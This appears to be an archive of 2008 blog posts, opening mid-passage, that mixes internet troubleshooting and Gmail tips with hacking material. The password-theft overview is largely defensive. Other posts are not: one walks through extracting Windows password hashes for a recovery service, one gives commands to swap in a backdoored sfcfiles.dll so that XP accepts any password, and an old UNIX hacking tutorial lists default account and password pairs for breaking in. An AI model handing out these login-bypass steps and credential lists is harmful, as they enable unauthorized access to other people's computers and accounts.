Because a single hard disk drive on a bulletin board system can contain thousands of messages from different users, the normal method for police will be to take the whole disk, and probably the computer as well, back to the lab to look for the suspect messages. Of course, that exposes other, supposedly confidential messages to police scrutiny. It also interrupts the legitimate operation of what is, in effect, an electronic printing press. Certainly, in the case of a real printing press that used paper, such police activity would never be allowed. But a computer is involved here, which to some appears to make the existing rules inapplicable. But in a case like this, we don't need a new amendment, just the proper application of the Bill of Rights. As a more practical matter, the chances of amending the Constitution are slight. It was the intent of the framers to make the task difficult, to prevent just such trivial things as flag-burning amendments from being tacked onto the document. Even the far more substantial Equal Rights Amendment did not survive the rocky road from proposal to adoption. I doubt Tribe's

Connectivity Issues

2008-01-09T03:18:00.000-08:00

If your having problems connecting to the internet here are some troubleshooting tips to help solve your internet connectivity issues. Please note that this article is written for Windows XP, but can be applied other operating systems. Be sure to pay attention to your computer and the steps it goes through when accessing the internet. Watch the small icon on your quick launch bar in the far right corner of your screen to see where it may be running into a problem. If you hold your mouse over the icon it should relay what part of the process it is currently working on or state of your connectivity. Also be aware of the icons and what they mean. If you are not connected there will be a small red x over the icon, and if there is some issues with your connectivity there may be a yellow triangle with an exclamation mark on it.
Establish a Connection:
First establish your internet is working and that all your cords are snapped in securely into place. Most problems occur between the router and the computer, so check to see if your internet connection is simply out first. Also be sure to check on the settings of your firewall. If you just installed one and haven’t allowed correct program access that may be the problem. If you suspect its your firewall disabled it to test out your connection if its not be sure to turn it back on.
Modem to computer:
* Unplug both router and modem* Connect your computer directly into the modem* Restart your computer* If your internet connection works then it is an issue between your router computer and modem.
Power Cycling:
Many times power cycling will solve your problem. You can also try resetting your modem and your router. If you have wireless security setup make sure you enable it again if you restart your router.
* Power down both router and modem* Plug modem back in wait until all lights are flashing correctly. Make sure not to skip this step, the modem needs to be able to recognize all ports connected to it.* Power router back on* Restart your computer
Checking and repairing your status via Network Connections:
If your on windows xp go to Start > Control Panel > Network Connections. From here you can view the current status’s of your internet connection. There may be many icons depending on if you have a wireless card or adapter hooked up to your computer. If your using a wired connection then you want to pay attention to the Local Area Connection icon. If your using a wireless connection then you want to focus on the Wireless Network Connection icon.
* Ensure your connections are not disabled, you can right click the icon to enable disabled connections.
* Right click and drop down to repair to see if it can fix your issue. Many times it will tell you a more specific error such as an ip conflict, or it will say: “Windows finished repairing your connection. You can try connecting again. If the problem persists, contact the person who manages your network.” This is an all clear sign that windows cannot detect a problem and your connection should be fine. Of course this isn’t always the case.
Ipconfig:
Another good way to see if your connected at all is ipconfig. To check ipconfig go to Start > Run > and type in cmd. This will open command prompt, then type in ipconfig. Become familiar with this while troubleshooting as it can help you isolate issues in the future. Ipconfig will show you your ip address, subnet mask and default gateway if your computer is receiving any. Your ipaddress is from your modem and generally if it shows up your getting a signal from your modem to your computer. If only your subnet mask shows up and the rest are 0.0.0.0 then there is no internet signal coming through your modem and you only have a connection to your router.
Limited or No Connectivity:
One of the most common, and sometimes the most frustrating annoyances of not being able to access the internet is the limited or no connectivity sign. If you just upgraded to service pack 2 are experiencing the limited or no connectivity error you can try downloading this patch from Microsoft.
* Releasing and renewing your DHCP via your router. Your computer to have to access your routers settings via your web browser if your not sure how to do this check with your routers hompage. With linksys I connect via the default gateway listed in ipconfig above. Example default gateway: 192.168.1.1. So in your browser type in http://192.168.1.1 it will ask for your password it varies from router to router try typing admin in either the username or only the password. If your not sure contact your routers customer support. On my Linksys the buttons to release and renew your DHCP is found under 'status'.
* Assign your own ip. While not recommended unless you’re an advanced user you can assign yourself an ipaddress if there happens to be an ip conflict in your system. Right click on your active internet connection via network connection drop down to repair. On the general tab highlight Internet Protocol (TCP/IP) and click properties. By default it should obtain an ip address automatically. From here you can specify your own ip address that another computer on your network may not be using. Generally it follows a code of Default Gateway: 192.168.1.1 Ip Address: 192.168.1.100 for one computer 192.168.1.102 for another computer and so on. Try to keep in line just add one close to it such as 192.168.1.105.
* Try resetting your winsock settings. Start > Run > cmd then type in winsock reset.
Other Tips:
If you just reinstalled your operating system, be sure to check to see if the drivers for your network device is correct. Start > right click My Computer > Hardware > Device Manager. From here you can view what you have update, or go to your computer manufacture’s homepage to see if there are any updated drivers. If your unable to connect on your computer you can download the updates to a cd rom or flash drive and transfer it to your computer.
If your using an adapter make sure that the signal and your adapter are on the same wavelength. For example; I had a wireless G adapter picking up a signal from a wireless B router. Even though it worked for a while it stopped working because they are actually broadcasting and receiving on different frequencies. Check your router and adapter for more information. Sometimes the newer versions broadcast on different frequencies to cover the bases, while the older models may just broadcast in one.
Don't forget to have a good and active security system on your computer including a firewall anti-virus and spyware scanners. Malware issues can also interfere with your computers connectivity.

How To: Hack Gmail

2008-01-09T03:13:00.000-08:00

Tired of stingy ISPs imposing arbitrary email restrictions on you? Yeah, so are we. 1MB attachment limits, 25MB storage limits, and restricted SMTP servers are sooo 1997. For a 21st-Century mail experience, step up to Gmail.
We know what you’re thinking: Webmail is webmail. But with 2.7GB of storage, 10MB attachment allowances, and an array of easy hacks that let you customize your mail account in almost any way you like, Gmail may be the most powerful e-mail tool the world has ever known. But enough of our yammering. Here’s how to turn your Gmail account into a messaging dynamo, and more.
1. Use Gmail as an Online Storage VaultNeed to keep important files handy? You don’t necessarily have to shell out 100 bucks for a high-capacity thumb drive. Instead, use Gmail’s free 2.7GB of storage as an off-site backup for the files you need access to. The easiest way is to simply attach your file to an email and shoot it to your Gmail account. Then you can retrieve it at any time just by logging in and running a quick search of your inbox. Of course, Gmail’s 10MB attachment limit means you won’t be able to archive massive documents. But it’s a great way keep your most essential files handy wherever there’s an Internet connection.
To take even greater advantage of Gmail’s free storage space, you’ll need to download a helper app. Firefox users can download Gmail Space from Mozilla’s Firefox Add-ons library, which turns the web browser into an easy-to-use file explorer. The extension lets you drag and drop files directly into Gmail’s storage space, without having to worry about the attachment size limit.
Alternatively, you can download Gmail Drive Shell Extension (free) for more ubiquitous access throughout your Windows PC. Gmail Drive Shell Extension sets up your Gmail storage space as a network drive on your PC, which you can access simply by double-clicking the GMail Drive icon in My Computer and then entering your Gmail username and password. Once you log in, your Gmail storage will act just like any other drive on your PC. It even works with Windows Vista.
2. Filter Your Mail with Positive ThinkingThe lowly plus sign gets little respect in this crazy, mixed-up world. But if you use it the right way with Gmail, it could become your new best friend. By adding a plus sign and a filter tag to your own Gmail address, you can figure out which of the sites that you’ve brazenly given your address to are turning around, stabbing you in your tender, fleshy backside, and selling it to every half-witted Pr0p3cia spammer on the net.
This little hack doesn’t require a single tweak to your Gmail settings. Instead, just use the plus/tag every time you enter your address into an online form. Our favorite method is to use the name of the site you’re visiting as the tag, so it’s easy to track later on. So if you buy some vintage kicks at Raresneakers.com, enter your email address as username+raresneakers@gmail.com.
Gmail ignores the plus sign and everything that comes after it, so messages sent to that address will still make their way to you. But if that site sells your address to its spamifying associates, you’ll know just by peeking at the To address in the header. How you choose to exact revenge is entirely up to you.
You can also use this tip to set up filters for registration codes, listservs, and anything else!
3. Take Notice with a NotifierYou don’t have to log into Gmail every time you want to see if you’ve got mail. Instead, download a Gmail notifier. Although it isn’t prominently featured on the Gmail site, Google’s own Gmail Notifier is a free download. If you’d rather not install a system tray icon, you can always use a Gmail plugin for Firefox. Gmail Checker is a low-profile plugin that requires barely a second thought to keep track of. But if you want to check multiple Gmail accounts from within Firefox, check out Gmail Manager.
4. Import Your Old Mail into GmailIf you decide to switch to Gmail completely, you’ll probably want to bring your old contacts and messages along for the ride. Importing your contacts is easy (just click Import in the upper-right corner of the Contacts screen and select a CSV file exported from your old mail app). Importing your old email takes a little more doing.
One of the easiest ways to get your old mail into Gmail is to download Mark Lyon’s Gmail Loader (aka GML), which you can download from www.marklyon.org/gmail/. This simple little utility will transfer messages in the mBox format (including Thunderbird, Eudora, and Netscape mailboxes) into Gmail. Transferring your mail is as easy as downloading the app, launching it, entering your Gmail login info, browsing for your mailbox folder, and clicking Send to Gmail.
To transfer Outlook mailboxes, try Outport, which can transfer messages from Outlook to a host of other mail readers, including Gmail. Like GML, Outport has a fairly simple GUI that’s easy to navigate, so you can get the job done quickly and with a minimum of mucking around.
Sadly, Gmail will stamp all the imported mail with the date on which you do the import, rather than preserve the original received dates from each of your imported messages. However, you can still find imported messages by date, because the original received dates are retained within the body of the messages. So simply searching for “Nov 06” will help you find all messages from November of 2006.
5. Turn Gmail into an MP3 PlayerIn the interest of convenience, Gmail has its own built-in audio player for use with file attachments. You can put it to work as an online MP3 player by using labels and mail filters to sort your files.
First, set up a label called MP3. Next, set up a filter that searches for MP3 content by clicking Create a Filter at the top of the screen. Enter “mp3” in the “Has the words” field and check the box marked “Has attachment.” This will search for any messages with music files attached (including any you may have uploaded using the GMail Drive Shell Extension mentioned earlier). Now click Next Step and check the box marked “Apply the label” and choose the label MP3. Now any time you want to pump up some jams, you can click the MP3 label on the left side of your screen and pick a tune from the list.
6. Email ImpersonatorJust because you’ve switched to Gmail, that doesn’t mean you have to give up your old email address. Gmail lets you send messages that appear to come from another address. In the settings pane, click Accounts and then choose “Add another email address,” then enter the address you’d like to use. To prevent you from ruining someone else’s life by masquerading as them on the Internet, Google will send a test message to verify that the address belongs to you. Then you can choose to make that new address your default identity, so nobody needs to know that you’re really sending from Gmail. To complete the transformation, set up a forwarder for your other address’s account, so that all of your mail reaches your Gmail account

HOW TO HACK AOL®, YAHOO® AND HOTMAIL®

2008-01-09T03:12:00.000-08:00

We get numerous calls from people who want to recover AOL®, Yahoo® or Hotmail® or other online and email passwords. We do not do this type of work. Many of these people claim that they have lost their passwords because they have been hacked and now need to get their password back. As we have reviewed information on the web, we found very little real information about the actual techniques that could be used to hack these services. So we decided to pull together a detailed explanation.

What follows is a detailed explanation of the methodologies involved. We do not condone any illegal activity and we clearly mention in this article techniques that are illegal. Sometimes these methods are known as "Phishing."

THE HOAX
Let's dispose of one technique that is absolutely a hoax (meaning a fraud: something intended to deceive; deliberate trickery intended to gain an advantage.) If you see a newsgroup post or web page with something like the following, it is a hoax and will not work.

: : : (([[THIS REALLY WORKS ]])) : : :
(1) send an E-mail to passwordrecovery@yourdomainhere.com
(2) In the subject box type the screenname of the person whose password you wish to steal
(3) In the message box type the following: /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f={your aol password}&f=27586&javascript=ACTIVE&rsa
(4) Send the e-mail with priority set to "high" (red ! in some mailprograms)
(5) wait 2-3 minutes and check your mail
(6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!
Why does this work? It´s a special decryption-server that AOL-employees can use to decrypt passwords.The aolbackdoor account is a bot that reads your authentification from the message body and identifiying you as a valid AOL Staff-member, you will get the password mailed back to you. The trick is that this Bot´s script seems to be a little bit buggy and it automatically recogises you as an supervisor (AOL-Staff member), even if you use a normal AOL account. This means, that EVERYONE having a valid AOL account can hack as many other accounts as he wants.

This is just a scam to steal your password and may explain some of the calls we get from people saying they were hacked. Never give your password to anyone. No legitimate web service or customer service representative will ask for it or need it. There is no magic email address or series of commands that will reveal the passwords of users.

LOCALLY STORED PASSWORDS
Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not recommend that these are secure. Software does exist that can recover most of the other types of locally stored passwords.

TROJAN
A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords reset.

KEYLOGGER
A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes, it is usually easy to identify the password(s) from the file later. Like the Trojan, this also requires that someone actually type the password. Keyloggers come in two types: hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. It is then left in place until after the password that you are looking to recover is typed. Later it is removed and the file of keystrokes is examined for the password. A hardware keylogger is undectable by anti-virus software. A software keylogger is installed on a system and effectively has the same function, however, it is a little bit more complex to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. It is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed.

IMPERSONATION
It is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let's say you login to the MSN® service and visit a website (in this case a hostile website.) It would be possible for this website to pop-up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer. The user could be fooled into submitting information to the hostile website. For instance, consider the effect of seeing the following series of windows:

If these could trick you into entering your password, then you could end-up sending your password to the attacker. Windows such as these could be created to mirror virtually any program or series of actions. Your browser will likely identify your operating system and your IP address might identify your ISP. Therefore, a hostile website could target you with a series of screen shots that look exactly as they should on your system. The key is that the screen shots are not coming from your system, but are coming from the hostile website. First, creating such a hostile website is probably fraudulent and illegal. We do not recommend or condone this activity. To protect yourself against this type of attack, make sure to configure your browser for high security and enable warnings for any code that is executed on your system.

SNIFFING
If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others' packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played-back." This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.

BRUTE-FORCE ATTACK
Many people want to find software to perform a brute-force attack. This is really impractical. It would take hundreds of thousands of years to attempt any kind of reasonable brute-force attack on AOL®, Yahoo® or Hotmail® and this would expand exponentially if the password is longer than the minimum length. Using multiple computers or multiple sessions could reduce this to merely thousands of years. This is highly illegal since these services own the servers on which an account is hosted. Even if you are hacking your own account, you don't own the servers and the service is going to monitor and log this activity. It is extremely unlikely that you could recover a password in this way, but it is extremely likely that you'd be arrested and prosecuted for doing this.

SOCIAL ENGINEERING
Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number of people would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate customer service representative will ask for this information.

These are the basic methods that we are aware of for hacking an AOL®, Yahoo®, Hotmail® or any other dial-up or on-line password. Hopefully this will answer some questions and help you protect yourself against these attacks.

Password Crackers, Inc. does offer an America Online (AOL)® Personal Filing Cabinet (.pfc) conversion service. We can convert AOL® Personal Filing Cabinets (.pfc) to either Netscape®, Microsoft Outlook® (.pst) or text (.txt) formats. You can get more information about this service here.

Recover Windows Login password within minutes

2008-01-09T03:10:00.000-08:00

google 3rd page

There are many ways to login to a password protected Windows even if you do not have the password. You can reset the current password to a defined password, make your Windows accept any passwords or decrypted the current password.Today I will introduce you a way on how you can recover your Windows login password within minutes.
Login Recovery is a service to reveal user names and recover passwords for Windows NT, 2000, XP, 2003 and Longhorn. As long as you have physical access to the computer, your passwords can be recovered.
By following three simple steps, over 98.5% of passwords can be recovered within less than ten minutes. This service does not overwrite passwords, it does not write anything to the hard drive, it does not alter the computer in any way. It simply reads the encrypted passwords for processing through their servers.
Currently there are 2 recovery service offered by Login Recovery. The free and priority service.

——————————————————————————————————-Step 1Perform the following on any Windows computer with internet access:——————————————————————————————————–1. Download this file.2. Run image.exe and it will prompt you to “Insert floppy to write”.3. Insert a blank floppy disk and click OK.4. Remove the disk when it’s done.
——————————————————————————————————-Step 2Perform the following on the computer you want to recover passwords from: (Windows NT/2000/XP/2003/Longhorn):——————————————————————————————————-1. Insert the disk THEN turn the computer on.2. Text will flick across the computer screen then the computer should switch off by itself. (Takes about two minutes)3. Remove the disk. (The computer will not have been changed in any way and will work normally again when the disk is removed)
——————————————————————————————————-Step 3Perform the following on any Windows computer with internet access:——————————————————————————————————-1. Insert the Disk.2. Go to http://www.loginrecovery.com/instructions.html and scroll down till you see a section where you need to Select file and enter Email address.3. Type A:\UPLOAD.TXT (type this exactly) into the box.4. Provide your email address so you can be contacted when the passwords have been recovered.5. Press Submit.6. Within minutes you should receive an email notifying you that the passwords have been processed.7. Check progress of recovery anytime by selecting the results tab8. If using the free service you will have to wait 48 hours for your passwords to be displayed to you.
Good luck in recovering Windows Login passwords! Tomorrow I will show you how you can make Windows accept any password to login to Windows!

How to Hack Into a Windows XP Computer Without Changing Password

2008-01-09T03:05:00.000-08:00

Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.2. Download DreamPackPL HERE.3. Unzip the downloaded dreampackpl.zip and you’ll get dreampackpl.ISO.4. Use any burning program that can burn ISO images.5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.6. Press “R” to install DreamPackPL.7. Press “C” to install DreamPackPL by using the recovery console.8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)9. Backup your original sfcfiles.dll by typing:“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)10. Copy the hacked file from CD to system32 folder. Type:“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)11. Type “exit”, take out disk and reboot.12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.13. Click the top graphic on the DreamPack menu and you will get a menu popup.14. Go to commands and enable the options and enable the god command.15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive

A Hacking Tutorial

2008-01-09T03:03:00.000-08:00

This phile is geared as an UNIX tutorial at first, to let you get morefamiliar with the operating system. UNIX is just an operating system, asis MS-DOS, AppleDOS, AmigaDOS, and others. UNIX happens to be a multi-user-multi-tasking system, thus bringing a need for security not found on MSDOS,AppleDOS, etc. This phile will hopefully teach the beginners who do not havea clue about how to use UNIX a good start, and may hopefully teach old prossomething they didn't know before. This file deals with UNIX SYSTEM V andits variants. When I talk about unix, its usually about SYSTEM V (rel 3.2).Where Can I be found? I have no Idea. The Boards today are going Up'n'Downso fast, 3 days after you read this file, if I put a BBS in it where you couldreach me, it may be down! Just look for me.I can be reached on DarkWood Castle [If it goes back up], but that boardis hard to get access on, but I decided to mention it anyway.I *COULD* Have been reached on jolnet, but......This file may have some bad spelling, etc, or discrepencies since it wasspread out over a long time of writing, because of school, work, Girl friend,etc. Please, no flames. If you don't like this file, don't keep it.This is distributed under PHAZE Inc. Here are the members (and ex ones)The Dark PawnThe Data WizardSir Hackalot (Me)Taxi (ummm.. Busted)Lancia (Busted)The British Knight (Busted)The Living Pharoah (Busted)_____________________________________________________________________________-------------o Dedication:------------- This phile is dedicated to the members of LOD that were raided inAtlanta. The members that got busted were very good hackers, especiallyThe Prophet. Good luck to you guys, and I hope you show up again somewhere._____________________________________________________________________________------------------------o A little History, etc:------------------------ UNIX, of course, was invented By AT&T in the 60's somewhere, to be"a programmer's operating system." While that goal was probably not reachedwhen they first invented UNIX, it seems that now, UNIX is a programmer's OS.UNIX, as I have said before, is a multi-tasking/multi-user OS. It is alsowritten in C, or at least large parts of it are, thus making it a portableoperating system. We know that MSDOS corresponds to IBM/clone machines,right? Well, this is not the case with UNIX. We do not associate it withany one computer since it has been adapted for many, and there are manyUNIX variants [that is, UNIX modified by a vendor, or such]. Some AT&Tcomputers run it, and also some run MSDOS [AT&T 6300]. The SUN workstationsrun SunOS, a UNIX variant, and some VAX computers run Ultrix, a VAX versionof UNIX. Remember, no matter what the name of the operating system is [BSD,UNIX,SunOS,Ultrix,Xenix, etc.], they still have a lot in common, such as thecommands the operating system uses. Some variants may have features othersdo not, but they are basically similar in that they have a lot of the samecommands/datafiles. When someone tries to tell you that UNIX goes along witha certain type of computer, they may be right, but remember, some computershave more than one Operating system. For instance, one person may tell youthat UNIX is to a VAX as MSDOS is to IBM/clones. That is untrue, and theonly reason I stated that, was because I have seen many messages with info/comparisons in it like that, which confuse users when they see a VAX runningVMS.____________________________________________________________________________-------------------------------o Identifying a Unix/Logging in------------------------------- From now on, I will be referring to all the UNIX variants/etc asUNIX, so when I say something about UNIX, it generally means all the variants(Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unlessI state a variant in particular. Okay. Now its time for me to tell you how a unix USUALLY greets you.First, when you call up a UNIX, or connect to one however you do, you willusually get this prompt:login:Ok. Thats all fine and dandy. That means that this is PROBABLY a Unix,although there are BBS's that can mimic the login procedure of an OS(Operating System), thus making some people believe its a Unix. [Hah!].Some Unixes will tell you what they are or give you a message before alogin: prompt, as such:Welcome to SHUnix. Please log in.login: Or something like that. Public access Unixes [like Public BBSs] willtell you how to logon if you are a new users. Unfortunatly, this phile isnot about public access Unixes, but I will talk about them briefly later, asa UUCP/UseNet/Bitnet address for mail. OK. You've gotten to the login prompt! Now, what you need to dohere is enter in a valid account. An Account usually consists of 8 charactersor less. After you enter in an account, you will probably get a passwordprompt of some sort. The prompts may vary, as the source code to the loginprogram is usually supplied with UNIX, or is readily available for free.Well, The easiest thing I can say to do to login is basically this:Get an account, or try the defaults. The defaults are ones that came withthe operating system, in standard form. The list of some of the Defaultsare as follows:ACCOUNT PASSWORD------- --------root root - Rarely open to hackerssys sys / system / binbin sys / binmountfsys mountfsysadm admuucp uucpnuucp anonanon anonuser usergames gamesinstall installreboot * See Belowdemo demoumountfsys umountfsyssync syncadmin adminguest guestdaemon daemonThe accounts root, mountfsys, umountfsys, install, and sometimes sync areroot level accounts, meaning they have sysop power, or total power. Otherlogins are just "user level" logins meaning they only have power over whatfiles/processes they own. I'll get into that later, in the file permissionssection. The REBOOT login is what as known as a command login, which justsimply doesn't let you into the operating system, but executes a programassigned to it. It usually does just what it says, reboot the system. Itmay not be standard on all UNIX systems, but I have seen it on UNISYS unixesand also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts havenot been passworded [reboot], which is real stupid, if you ask me.COMMAND LOGINS:---------------There are "command logins", which, like reboot, execute a command then logyou off instead of letting you use the command interpreter. BSD is notoriousfor having these, and concequently, so does MIT's computers. Here are some:rwho - show who is onlinefinger - samewho - sameThese are the most useful, since they will give the account names that areonline, thus showing you several accounts that actually exist.Errors:-------When you get an invalid Account name / invalid password, or both, you willget some kind of error. Usually it is the "login incorrect" message. Whenthe computer tells you that, you have done something wrong by either enterringan invalid account name, or a valid account name, but invalid password. Itdoes not tell you which mistake you made, for obvious reasons. Also,when you login incorrectly, the error log on the system gets updated, lettingthe sysops(s) know something is amiss. Another error is "Cannot change to home directory" or "Cannot ChangeDirectory." This means that no "home directory" which is essentially the'root' directory for an account, which is the directory you start off in.On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in/homedirectory. [Note: The / is used in directories on UNIX, not a \ ].Most systems will log you off after this, but some tell you that they willput you in the root directory [ '/']. Another error is "No Shell". This means that no "shell" was definedfor that particular account. The "shell" will be explained later. Somesystems will log you off after this message. Others will tell you that theywill use the regular shell, by saying "Using the bourne shell", or "Using sh"-----------------------------Accounts In General :----------------------------- This section is to hopefully describe to you the user structurein the UNIX environment. Ok, think of UNIX having two levels of security: absolute power,or just a regular user. The ones that have absolute power are those usersat the root level. Ok, now is the time to think in numbers. Unix associatesnumbers with account names. each account will have a number. Some will havethe same number. That number is the UID [user-id] of the account. the rootuser id is 0. Any account that has a user id of 0 will have root access.Unix does not deal with account names (logins) but rather the numberassociated with them. for instance, If my user-id is 50, and someone else'sis 50, with both have absolute power of each other, but no-one else._____________________________________________________________________________---------------Shells :--------------- A shell is an executable program which loads and runs when a userlogs on, and is in the foreground. This "shell" can be any executable prog-ram, and it is defined in the "passwd" file which is the userfile. Eachlogin can have a unique "shell". Ok. Now the shell that we usually will workwith is a command interpreter. A command interpreter is simply somethinglike MSDOS's COMMAND.COM, which processes commands, and sends them to thekernel [operating system]. A shell can be anything, as I said before,but the one you want to have is a command interpreter. Here are theusual shells you will find:sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has a "script" language, as do most of the command interpreters on Unix sys- tems.csh - This is the "C" shell, which will allow you to enter "C" like commands.ksh - this is the korn shell. Just another command interpreter.tcsh - this is one, which is used at MIT I believe. Allows command editing.vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOSrsh - restricted shell OR remote shell. Both Explained later. There are many others, including "homemade " shells, which areprograms written by the owner of a unix, or for a specific unix, and theyare not standard. Remember, the shell is just the program you get to useand when it is done executing, you get logged off. A good example of ahomemade shell is on Eskimo North, a public access Unix. The shellis called "Esh", and it is just something like a one-key-press BBS,but hey, its still a shell. The Number to eskimo north is 206-387-3637.[206-For-Ever]. If you call there, send Glitch Lots of mail. Several companies use Word Processors, databases, and other thingsas a user shell, to prevent abuse, and make life easier for unskilled computeroperators. Several Medical Hospitals use this kind of shell in Georgia,and fortunatly, these second rate programs leave major holes in Unix.Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, theygive you a choice between a command interpreter, or a BBS as a shell.WHen you have a command interpreter, the prompt is usually a: $when you are a root user the prompt is usually a: #The variable, PS1, can be set to hold a prompt.For instance, if PS1 is "HI:", your prompt will be: HI:_____________________________________________________________________________------------------------SPecial Characters, ETc:------------------------Control-D : End of file. When using mail or a text editor, this will endthe message or text file. If you are in the shell and hit control-d you getlogged off.Control-J: On some systems, this is like the enter key.@ : Is sometimes a "null"? : This is a wildcard. This can represent a letter. If you specified something at the command line like "b?b" Unix would look for bob,bib,bub, and every other letter/number between a-z, 0-9.* : this can represent any number of characters. If you specified a "hi*" it would use "hit", him, hiiii, hiya, and ANYTHING that starts with hi. "H*l" could by hill, hull, hl, and anything that starts with an H and ends with an L.[] - The specifies a range. if i did b[o,u,i]b unix would think: bib,bub,bob if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb. Get the idea? The [], ?, and * are usually used with copy, deleting files, and directory listings.EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are notthe same thing. This allows for many files to be able to be stored, since"Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when usingthe [] stuff, you have to specify capital letters if any files you are dealingwith has capital letters. Most everything is lower case though.----------------Commands to use:----------------Now, I will rundown some of the useful commands of Unix. I will actas if I were typing in the actual command from a prompt.ls - this is to get a directory. With no arguments, it will just print out file names in either one column or multi-column output, depending on the ls program you have access to. example: $ ls hithere runme note.text src $ the -l switch will give you extended info on the files. $ ls -l rwx--x--x sirhack sirh 10990 runme and so on....the "rwx--x--x" is the file permission. [Explained Later]the "sirhack sirh" is the owner of the file/group the file is in.sirhack = owner, sirh = user-group the file is in [explained later]the 10990 is the size of the file in bytes."runme" is the file name.The format varies, but you should have the general idea.cat - this types out a file onto the screen. should be used on text files. only use it with binary files to make a user mad [explained later] ex: $ cat note.txt This is a sample text file! $cd - change directory . You do it like this: cd /dir/dir1/dir2/dirn. the dir1/etc.... describes the directory name. Say I want to get to the root directory. ex: $ cd / *ok, I'm there.* $ ls bin sys etc temp work usr all of the above are directories, lets say. $ cd /usr $ ls sirhack datawiz prophet src violence par phiber scythian $ cd /usr/sirhack $ ls hithere runme note.text src $ok, now, you do not have to enter the full dir name. if you are ina directory, and want to get into one that is right there [say "src"], youcan type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from thesirhack dir, you can type "cd src"cp - this copies a file. syntax for it is "cp fromfile tofile" $ cp runme runme2 $ ls hithere runme note.text src runme2Full pathnames can be included, as to copy it to another directory. $ cp runme /usr/datwiz/runmemv - this renames a file. syntax "mv oldname newname" $ mv runme2 runit $ ls hithere runme note.text src runit files can be renamed into other directories. $ mv runit /usr/datwiz/run $ ls hithere runme note.text src $ ls /usr/datwiz runme runpwd - gives current directory $ pwd /usr/sirhack $ cd src $ pwd /usr/sirhack/src $ cd .. $ pwd /usr/sirhack [ the ".." means use the name one directory back. ] $ cd ../datwiz [translates to cd /usr/datwiz] $ pwd /usr/datwiz $ cd $home [goto home dir] $ pwd /usr/sirhackrm - delete a file. syntax "rm filename" or "rm -r directory name" $ rm note.text $ ls hithere runme src $write - chat with another user. Well, "write" to another user.syntax: "write username" $ write scythian scythian has been notified Hey Scy! What up?? Message from scythian on tty001 at 17:32 hey! me: So, hows life? scy: ok, I guess. me: gotta go finish this text file. scy: ok me: control-D [to exit program] $who [w,who,whodo] - print who is online $ who login term logontime scythian + tty001 17:20 phiberO + tty002 15:50 sirhack + tty003 17:21 datawiz - tty004 11:20 glitch - tty666 66:60 $ the "who" commands may vary in the information given. a "+" means you can "write" to their terminal, a "-" means you cannot.man - show a manual page entry. syntax "man command name" This is a help program. If you wanted to know how to use... "who" you'd type $ man who WHO(1) xxx...... and it would tell you.stty - set your terminal characteristics. You WILL have to do "man stty" since each stty is different, 